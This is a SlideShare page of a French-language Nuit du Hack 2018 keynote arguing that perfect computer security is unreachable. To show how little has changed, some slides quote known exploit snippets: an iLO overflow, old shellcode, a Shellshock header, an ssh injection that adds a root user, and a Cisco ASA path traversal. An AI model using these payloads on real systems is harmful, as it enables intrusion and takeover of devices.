SlideShare une entreprise Scribd logo
1  sur  38
Télécharger pour lire hors ligne
Ceci n’est pas une Keynote
Gaël Delalleau

Kog.ai

@gaeldelalleau
Disclaimer : les slides de cette non-Keynote ont été réalisés avec Keynote®
NDH 2018
FAIR WARNING - expect:

…slides and talk in french

…subjective thoughts (trolling?)

…incomplete demonstrations

…offensive pics of turtles

…biased opinions which are my own, not
my employer’s (though I am self-employed, so… maybe they are not my opinions after
all. Or are they? Or…)
Progrès réalisés en 30 ans
Progrès réalisés en 30 ans

Connection:	AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP	management	interface	exploit
Progrès réalisés en 30 ans

Connection:	AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP	management	interface	exploit
			for(j	=	0;	j	<	28;	j++)	
	 buf[i+j]	=	"335217/sh0335217/bin320^Z33503350335Z335003320^
274;344371344342241256343350357256362351"[j];	
				l556	=	0x7fffe9fc;	
				l560	=	0x7fffe8a8;	
				l564	=	0x7fffe8bc;	
				l568	=	0x28000000;	
				l552	=	0x0001c020;	
				write(s,	buf,	sizeof(buf));	
UNIX	network	service	exploit
Progrès réalisés en 30 ans

Connection:	AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP	management	interface	exploit
			for(j	=	0;	j	<	28;	j++)	
	 buf[i+j]	=	"335217/sh0335217/bin320^Z33503350335Z335003320^
274;344371344342241256343350357256362351"[j];	
				l556	=	0x7fffe9fc;	
				l560	=	0x7fffe8a8;	
				l564	=	0x7fffe8bc;	
				l568	=	0x28000000;	
				l552	=	0x0001c020;	
				write(s,	buf,	sizeof(buf));	
UNIX	network	service	exploit
CVE-2017-12542
Progrès réalisés en 30 ans

Connection:	AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP	management	interface	exploit
			for(j	=	0;	j	<	28;	j++)	
	 buf[i+j]	=	"335217/sh0335217/bin320^Z33503350335Z335003320^
274;344371344342241256343350357256362351"[j];	
				l556	=	0x7fffe9fc;	
				l560	=	0x7fffe8a8;	
				l564	=	0x7fffe8bc;	
				l568	=	0x28000000;	
				l552	=	0x0001c020;	
				write(s,	buf,	sizeof(buf));	
UNIX	network	service	exploit
CVE-2017-12542
Ver de Morris (1988)
Les trois règles d’or de la sécurité
informatique (~1990)

Recommandations (2018)

• « Do not connect iLO to your network if the interface is not actually used

• Do not expose any iLO interface to any untrusted network »
curl -H "User-Agent: () { :; }; /bin/xxxxxx" http://example.com/
Shellshock	(2014)
ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)’@example.com
Dell	EMC	Recoverpoint	(2018)
Cisco	ASA	(2018)
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
Mais pourquoi ?
Notre quête : la sécurité à 100%
Poll : la sécurité à 100%
La métacryptoblockchaincurrency
Ethereum	Yellow	Paper	(2014)
La Preuve Mathématique
Petits détails…
• Décidabilité

• Complexité (NP / combinatoire…)

• « Computational irreducibility »
Wolfram’s rule 30
Wolfram’s rule 30
En pratique
• Spécification du modèle : existante ? prouvée ? couvrant tous les
besoins sécurité ?

• Confiance sur toute la chaîne : Preuve du prouveur ? De tous les
outils ? De l’environnement d’exécution ? Du système complet ?

• Implémentation du modèle et des outils : prouvée ? immutable ?

• Interactions avec l’environnement : intégrables dans le modèle ?

• Weird machines

• Evolution dynamique dans le temps

• Changements de paradigme
En pratique
• Spécification du modèle : existante ? prouvée ? couvrant tous les
besoins sécurité ?

• Confiance sur toute la chaîne : Preuve du prouveur ? De tous les
outils ? De l’environnement d’exécution ? Du système complet ?

• Implémentation du modèle et des outils : prouvée ? immutable ?

• Interactions avec l’environnement : intégrables dans le modèle ?

• Weird machines

• Evolution dynamique dans le temps

• Changements de paradigme
Heureusement, il y a…
l’Intel®ligence(™) Artificielle© !
Les systèmes de calcul
automatisés et biologiques
ne sont donc pas près
d’être 100% prévisibles, et
donc sécurisés !
Tout est interaction donc tout est calcul
Si rien n’est sécurisé…

…tout devient possible ?
Hack the planet !
(pour la comprendre et l’améliorer)

Contenu connexe

Similaire à Keynote Gaël Delalleau Nuit du Hack 2018 - Cité des Sciences

Pas d'agilité sans qualité
Pas d'agilité sans qualitéPas d'agilité sans qualité
Pas d'agilité sans qualitéAgile Montréal
 
Développeur ta prod tu respecteras !
Développeur ta prod tu respecteras !Développeur ta prod tu respecteras !
Développeur ta prod tu respecteras !EmileChomton1
 
Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013
Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013
Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013Xavier NOPRE
 
Radical Quality From Toyota to Tech - Devoxx France.pptx
Radical Quality From Toyota to Tech - Devoxx France.pptxRadical Quality From Toyota to Tech - Devoxx France.pptx
Radical Quality From Toyota to Tech - Devoxx France.pptxFlavian Hautbois
 
Qu'est ce qu'un logiciel de qualité
Qu'est ce qu'un logiciel de qualitéQu'est ce qu'un logiciel de qualité
Qu'est ce qu'un logiciel de qualitéSylvain Leroy
 
Usine logicielle à Orange Labs
Usine logicielle à Orange LabsUsine logicielle à Orange Labs
Usine logicielle à Orange LabsEmmanuel Hugonnet
 
Keynote Retmo2018 : le test QA et UAT en méthode agile
Keynote Retmo2018 : le test QA et UAT en méthode agileKeynote Retmo2018 : le test QA et UAT en méthode agile
Keynote Retmo2018 : le test QA et UAT en méthode agileStardustTesting
 
Soirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualife
Soirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualifeSoirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualife
Soirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualifeTelecomValley
 
Du Code & Des Humains - Agile Tour Strasbourg 2017
Du Code & Des Humains - Agile Tour Strasbourg 2017Du Code & Des Humains - Agile Tour Strasbourg 2017
Du Code & Des Humains - Agile Tour Strasbourg 2017Nicolas VERINAUD
 
Deployer en continu, Benoît Lafontaine, USIEVENT 2013
Deployer en continu, Benoît Lafontaine, USIEVENT 2013Deployer en continu, Benoît Lafontaine, USIEVENT 2013
Deployer en continu, Benoît Lafontaine, USIEVENT 2013Benoît Lafontaine
 
Mettez un peu de CI/CD dans vos projets data !
Mettez un peu de CI/CD dans vos projets data !Mettez un peu de CI/CD dans vos projets data !
Mettez un peu de CI/CD dans vos projets data !Guillaume Rouchon
 
Modelisation agile 03122011
Modelisation agile  03122011Modelisation agile  03122011
Modelisation agile 03122011agnes_crepet
 
Agilité, Tests Et Industrialisation
Agilité, Tests Et IndustrialisationAgilité, Tests Et Industrialisation
Agilité, Tests Et IndustrialisationPHPPRO
 
Retour d'expérience TAA - 2011/03/29
Retour d'expérience TAA - 2011/03/29Retour d'expérience TAA - 2011/03/29
Retour d'expérience TAA - 2011/03/29Elapse Technologies
 
Du Code & Des Humains - ElsassJUG 2018
Du Code & Des Humains - ElsassJUG 2018Du Code & Des Humains - ElsassJUG 2018
Du Code & Des Humains - ElsassJUG 2018Nicolas VERINAUD
 
Gp unified process
Gp unified processGp unified process
Gp unified processMoez Re
 
TIAD : Choisir et construire son projet d’automatisation
TIAD : Choisir et construire son projet d’automatisationTIAD : Choisir et construire son projet d’automatisation
TIAD : Choisir et construire son projet d’automatisationThe Incredible Automation Day
 

Similaire à Keynote Gaël Delalleau Nuit du Hack 2018 - Cité des Sciences (20)

Usine Logicielle 2013
Usine Logicielle 2013Usine Logicielle 2013
Usine Logicielle 2013
 
Pas d'agilité sans qualité
Pas d'agilité sans qualitéPas d'agilité sans qualité
Pas d'agilité sans qualité
 
Développeur ta prod tu respecteras !
Développeur ta prod tu respecteras !Développeur ta prod tu respecteras !
Développeur ta prod tu respecteras !
 
Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013
Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013
Agilistes : n'oubliez pas la technique ! - Agile France - 23/05/2013
 
Brochure Vers l'entreprise Agile
Brochure Vers l'entreprise AgileBrochure Vers l'entreprise Agile
Brochure Vers l'entreprise Agile
 
Radical Quality From Toyota to Tech - Devoxx France.pptx
Radical Quality From Toyota to Tech - Devoxx France.pptxRadical Quality From Toyota to Tech - Devoxx France.pptx
Radical Quality From Toyota to Tech - Devoxx France.pptx
 
Qu'est ce qu'un logiciel de qualité
Qu'est ce qu'un logiciel de qualitéQu'est ce qu'un logiciel de qualité
Qu'est ce qu'un logiciel de qualité
 
Usine logicielle à Orange Labs
Usine logicielle à Orange LabsUsine logicielle à Orange Labs
Usine logicielle à Orange Labs
 
Keynote Retmo2018 : le test QA et UAT en méthode agile
Keynote Retmo2018 : le test QA et UAT en méthode agileKeynote Retmo2018 : le test QA et UAT en méthode agile
Keynote Retmo2018 : le test QA et UAT en méthode agile
 
Soirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualife
Soirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualifeSoirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualife
Soirée du Test Logiciel - Démystifier les xDD - C. TARDIEU, Acp qualife
 
Du Code & Des Humains - Agile Tour Strasbourg 2017
Du Code & Des Humains - Agile Tour Strasbourg 2017Du Code & Des Humains - Agile Tour Strasbourg 2017
Du Code & Des Humains - Agile Tour Strasbourg 2017
 
Deployer en continu, Benoît Lafontaine, USIEVENT 2013
Deployer en continu, Benoît Lafontaine, USIEVENT 2013Deployer en continu, Benoît Lafontaine, USIEVENT 2013
Deployer en continu, Benoît Lafontaine, USIEVENT 2013
 
Mettez un peu de CI/CD dans vos projets data !
Mettez un peu de CI/CD dans vos projets data !Mettez un peu de CI/CD dans vos projets data !
Mettez un peu de CI/CD dans vos projets data !
 
Modelisation agile 03122011
Modelisation agile  03122011Modelisation agile  03122011
Modelisation agile 03122011
 
Agilité, Tests Et Industrialisation
Agilité, Tests Et IndustrialisationAgilité, Tests Et Industrialisation
Agilité, Tests Et Industrialisation
 
Retour d'expérience TAA - 2011/03/29
Retour d'expérience TAA - 2011/03/29Retour d'expérience TAA - 2011/03/29
Retour d'expérience TAA - 2011/03/29
 
Paris Chaos Engineering Meetup #5
Paris Chaos Engineering Meetup #5Paris Chaos Engineering Meetup #5
Paris Chaos Engineering Meetup #5
 
Du Code & Des Humains - ElsassJUG 2018
Du Code & Des Humains - ElsassJUG 2018Du Code & Des Humains - ElsassJUG 2018
Du Code & Des Humains - ElsassJUG 2018
 
Gp unified process
Gp unified processGp unified process
Gp unified process
 
TIAD : Choisir et construire son projet d’automatisation
TIAD : Choisir et construire son projet d’automatisationTIAD : Choisir et construire son projet d’automatisation
TIAD : Choisir et construire son projet d’automatisation
 

Dernier

GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenusGAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenusInstitut de l'Elevage - Idele
 
GAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentesGAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentesInstitut de l'Elevage - Idele
 
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...Institut de l'Elevage - Idele
 
GAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engageGAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engageInstitut de l'Elevage - Idele
 
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...Institut de l'Elevage - Idele
 
conception d'un batiment r+4 comparative de defferente ariante de plancher
conception d'un  batiment  r+4 comparative de defferente ariante de plancherconception d'un  batiment  r+4 comparative de defferente ariante de plancher
conception d'un batiment r+4 comparative de defferente ariante de planchermansouriahlam
 
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...Institut de l'Elevage - Idele
 
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...Institut de l'Elevage - Idele
 
WBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdfWBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdfSophie569778
 
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...Institut de l'Elevage - Idele
 
comprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestioncomprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestionyakinekaidouchi1
 
JTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdfJTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdfInstitut de l'Elevage - Idele
 
Câblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdfCâblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdfmia884611
 
GAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversitéGAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversitéInstitut de l'Elevage - Idele
 
JTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdfJTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdfInstitut de l'Elevage - Idele
 
Algo II : les piles ( cours + exercices)
Algo II :  les piles ( cours + exercices)Algo II :  les piles ( cours + exercices)
Algo II : les piles ( cours + exercices)Sana REFAI
 
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdfJTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdfInstitut de l'Elevage - Idele
 

Dernier (20)

JTC 2024 Bâtiment et Photovoltaïque.pdf
JTC 2024  Bâtiment et Photovoltaïque.pdfJTC 2024  Bâtiment et Photovoltaïque.pdf
JTC 2024 Bâtiment et Photovoltaïque.pdf
 
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenusGAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
GAL2024 - Situation laitière 2023-2024 : consommation, marchés, prix et revenus
 
GAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentesGAL2024 - Changements climatiques et maladies émergentes
GAL2024 - Changements climatiques et maladies émergentes
 
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
GAL2024 - Renouvellement des actifs : un enjeu pour la filière laitière franç...
 
GAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engageGAL2024 - Décarbonation du secteur laitier : la filière s'engage
GAL2024 - Décarbonation du secteur laitier : la filière s'engage
 
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
JTC 2024 - Leviers d’adaptation au changement climatique, qualité du lait et ...
 
conception d'un batiment r+4 comparative de defferente ariante de plancher
conception d'un  batiment  r+4 comparative de defferente ariante de plancherconception d'un  batiment  r+4 comparative de defferente ariante de plancher
conception d'un batiment r+4 comparative de defferente ariante de plancher
 
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
GAL2024 - Consommations et productions d'énergies dans les exploitations lait...
 
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
GAL2024 - Parcellaire des fermes laitières : en enjeu de compétitivité et de ...
 
WBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdfWBS OBS RACI_2020-etunhjjlllllll pdf.pdf
WBS OBS RACI_2020-etunhjjlllllll pdf.pdf
 
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
GAL2024 - Traite des vaches laitières : au coeur des stratégies d'évolution d...
 
comprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestioncomprehension de DDMRP dans le domaine de gestion
comprehension de DDMRP dans le domaine de gestion
 
JTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdfJTC 2024 - Réglementation européenne BEA et Transport.pdf
JTC 2024 - Réglementation européenne BEA et Transport.pdf
 
JTC 2024 - DeCremoux_Anomalies_génétiques.pdf
JTC 2024 - DeCremoux_Anomalies_génétiques.pdfJTC 2024 - DeCremoux_Anomalies_génétiques.pdf
JTC 2024 - DeCremoux_Anomalies_génétiques.pdf
 
Câblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdfCâblage, installation et paramétrage d’un réseau informatique.pdf
Câblage, installation et paramétrage d’un réseau informatique.pdf
 
GAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversitéGAL2024 - L'élevage laitier cultive la biodiversité
GAL2024 - L'élevage laitier cultive la biodiversité
 
CAP2ER_GC_Presentation_Outil_20240422.pptx
CAP2ER_GC_Presentation_Outil_20240422.pptxCAP2ER_GC_Presentation_Outil_20240422.pptx
CAP2ER_GC_Presentation_Outil_20240422.pptx
 
JTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdfJTC 2024 La relance de la filière de la viande de chevreau.pdf
JTC 2024 La relance de la filière de la viande de chevreau.pdf
 
Algo II : les piles ( cours + exercices)
Algo II :  les piles ( cours + exercices)Algo II :  les piles ( cours + exercices)
Algo II : les piles ( cours + exercices)
 
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdfJTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
JTC 2024 - SMARTER Retour sur les indicateurs de santé .pdf
 

Keynote Gaël Delalleau Nuit du Hack 2018 - Cité des Sciences

  • 1. Ceci n’est pas une Keynote Gaël Delalleau Kog.ai @gaeldelalleau Disclaimer : les slides de cette non-Keynote ont été réalisés avec Keynote® NDH 2018
  • 2. FAIR WARNING - expect: …slides and talk in french …subjective thoughts (trolling?) …incomplete demonstrations …offensive pics of turtles …biased opinions which are my own, not my employer’s (though I am self-employed, so… maybe they are not my opinions after all. Or are they? Or…)
  • 4. Progrès réalisés en 30 ans Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA HP management interface exploit
  • 5. Progrès réalisés en 30 ans Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA HP management interface exploit for(j = 0; j < 28; j++) buf[i+j] = "335217/sh0335217/bin320^Z33503350335Z335003320^ 274;344371344342241256343350357256362351"[j]; l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; l568 = 0x28000000; l552 = 0x0001c020; write(s, buf, sizeof(buf)); UNIX network service exploit
  • 6. Progrès réalisés en 30 ans Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA HP management interface exploit for(j = 0; j < 28; j++) buf[i+j] = "335217/sh0335217/bin320^Z33503350335Z335003320^ 274;344371344342241256343350357256362351"[j]; l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; l568 = 0x28000000; l552 = 0x0001c020; write(s, buf, sizeof(buf)); UNIX network service exploit CVE-2017-12542
  • 7. Progrès réalisés en 30 ans Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA HP management interface exploit for(j = 0; j < 28; j++) buf[i+j] = "335217/sh0335217/bin320^Z33503350335Z335003320^ 274;344371344342241256343350357256362351"[j]; l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; l568 = 0x28000000; l552 = 0x0001c020; write(s, buf, sizeof(buf)); UNIX network service exploit CVE-2017-12542 Ver de Morris (1988)
  • 8. Les trois règles d’or de la sécurité informatique (~1990) Recommandations (2018) • « Do not connect iLO to your network if the interface is not actually used • Do not expose any iLO interface to any untrusted network »
  • 9. curl -H "User-Agent: () { :; }; /bin/xxxxxx" http://example.com/ Shellshock (2014) ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)’@example.com Dell EMC Recoverpoint (2018) Cisco ASA (2018) active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
  • 11. Notre quête : la sécurité à 100%
  • 12. Poll : la sécurité à 100%
  • 15.
  • 16.
  • 17.
  • 18.
  • 20. Petits détails… • Décidabilité • Complexité (NP / combinatoire…) • « Computational irreducibility »
  • 23. En pratique • Spécification du modèle : existante ? prouvée ? couvrant tous les besoins sécurité ? • Confiance sur toute la chaîne : Preuve du prouveur ? De tous les outils ? De l’environnement d’exécution ? Du système complet ? • Implémentation du modèle et des outils : prouvée ? immutable ? • Interactions avec l’environnement : intégrables dans le modèle ? • Weird machines • Evolution dynamique dans le temps • Changements de paradigme
  • 24. En pratique • Spécification du modèle : existante ? prouvée ? couvrant tous les besoins sécurité ? • Confiance sur toute la chaîne : Preuve du prouveur ? De tous les outils ? De l’environnement d’exécution ? Du système complet ? • Implémentation du modèle et des outils : prouvée ? immutable ? • Interactions avec l’environnement : intégrables dans le modèle ? • Weird machines • Evolution dynamique dans le temps • Changements de paradigme
  • 25.
  • 26.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34. Les systèmes de calcul automatisés et biologiques ne sont donc pas près d’être 100% prévisibles, et donc sécurisés !
  • 35. Tout est interaction donc tout est calcul
  • 36.
  • 37. Si rien n’est sécurisé… …tout devient possible ?
  • 38. Hack the planet ! (pour la comprendre et l’améliorer)